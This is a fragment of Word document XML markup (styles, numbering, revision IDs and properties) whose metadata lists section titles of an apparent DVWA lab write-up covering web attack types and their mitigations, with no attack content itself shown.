  <w:num w:numId="42" w16cid:durableId="151602256">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1750469194">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1032269070">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="628048364">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="212549467">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1046612178">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="317075786">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="726729146">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="1434937596">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="35933592">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="317029361">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="680593315">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="33964205">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="313729203">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="1999839086">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="1832595857">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="1155147220">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="476072223">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1103650089">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="1966546807">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="903949939">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="684400752">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="785779606">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="1131749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83"/>
    <w:rsid w:val="00005892"/>
    <w:rsid w:val="000715FE"/>
    <w:rsid w:val="000A5BCA"/>
    <w:rsid w:val="000F3309"/>
    <w:rsid w:val="00116D51"/>
    <w:rsid w:val="00131E86"/>
    <w:rsid w:val="002521BE"/>
    <w:rsid w:val="0029543A"/>
    <w:rsid w:val="002A5C76"/>
    <w:rsid w:val="002D4841"/>
    <w:rsid w:val="002F2587"/>
    <w:rsid w:val="00432DDD"/>
    <w:rsid w:val="004363B6"/>
    <w:rsid w:val="00437AAA"/>
    <w:rsid w:val="004C55B9"/>
    <w:rsid w:val="004C60AE"/>
    <w:rsid w:val="0055184D"/>
    <w:rsid w:val="005738BF"/>
    <w:rsid w:val="005E0565"/>
    <w:rsid w:val="00611337"/>
    <w:rsid w:val="00650A90"/>
    <w:rsid w:val="007043FE"/>
    <w:rsid w:val="00752CC4"/>
    <w:rsid w:val="007A6DE1"/>
    <w:rsid w:val="007B384D"/>
    <w:rsid w:val="009036BC"/>
    <w:rsid w:val="00940741"/>
    <w:rsid w:val="00984C64"/>
    <w:rsid w:val="009A7A13"/>
    <w:rsid w:val="009B25FB"/>
    <w:rsid w:val="00A03E93"/>
    <w:rsid w:val="00A33E48"/>
    <w:rsid w:val="00A60ABB"/>
    <w:rsid w:val="00A62E25"/>
    <w:rsid w:val="00A92E26"/>
    <w:rsid w:val="00B2757E"/>
    <w:rsid w:val="00B422E0"/>
    <w:rsid w:val="00B45D0A"/>
    <w:rsid w:val="00B87EB2"/>
    <w:rsid w:val="00C01A3C"/>
    <w:rsid w:val="00C119EB"/>
    <w:rsid w:val="00C3342D"/>
    <w:rsid w:val="00C3478B"/>
    <w:rsid w:val="00C41C15"/>
    <w:rsid w:val="00CB0383"/>
    <w:rsid w:val="00CB3668"/>
    <w:rsid w:val="00CB3DB0"/>
    <w:rsid w:val="00CB5ECD"/>
    <w:rsid w:val="00CC7943"/>
    <w:rsid w:val="00D1136B"/>
    <w:rsid w:val="00D91AFC"/>
    <w:rsid w:val="00DF0176"/>
    <w:rsid w:val="00E1093B"/>
    <w:rsid w:val="00E134FF"/>
    <w:rsid w:val="00E268E0"/>
    <w:rsid w:val="00E3654C"/>
    <w:rsid w:val="00E56E47"/>
    <w:rsid w:val="00EC4E7E"/>
    <w:rsid w:val="00EF109E"/>
    <w:rsid w:val="00F97D8B"/>
    <w:rsid w:val="00FE436D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BA4C0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E867E1FC-A4AC-4D7C-9DCF-940CBAFF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B2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00CB0383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383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0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0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0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383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B038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03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3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038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05892"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia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05892"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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005892"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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005892"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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005892"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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005892"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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005892"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia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058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2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E0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B42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E0"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00C41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6D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14EC-1277-41E6-B48B-EA36F870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9</Pages>
  <Words>4224</Words>
  <Characters>2407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5</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="86" baseType="lpstr">
      <vt:lpstr>DVWA</vt:lpstr>
      <vt:lpstr/>
      <vt:lpstr>Bruteforce-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med</vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
      <vt:lpstr>Command Injection-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med </vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
      <vt:lpstr>CSRF_XSRF_SessionRiding_OneClick-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med</vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
      <vt:lpstr>File Inclusion-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med</vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
      <vt:lpstr>File Upload-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med</vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
      <vt:lpstr>Insecure CAPTCHA-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med</vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
      <vt:lpstr>SQL Injection-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med</vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
      <vt:lpstr>SQL Blind-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med</vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
      <vt:lpstr>Weak Session IDs-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med</vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
      <vt:lpstr>XSS DOM-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med</vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
      <vt:lpstr>XSS Reflected-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med</vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
      <vt:lpstr>XSS Stored-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med</vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
      <vt:lpstr>Content Security Policy Bypass-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med</vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
      <vt:lpstr>JavaScript-Attack</vt:lpstr>
      <vt:lpstr>    Intro</vt:lpstr>
      <vt:lpstr>    Low</vt:lpstr>
      <vt:lpstr>    Med</vt:lpstr>
      <vt:lpstr>    High</vt:lpstr>
      <vt:lpstr>    Mitigation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2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</dc:title>
  <dc:subject/>
  <dc:creator>Keshav singh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Keshav singh</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-18T18:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-21T13:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>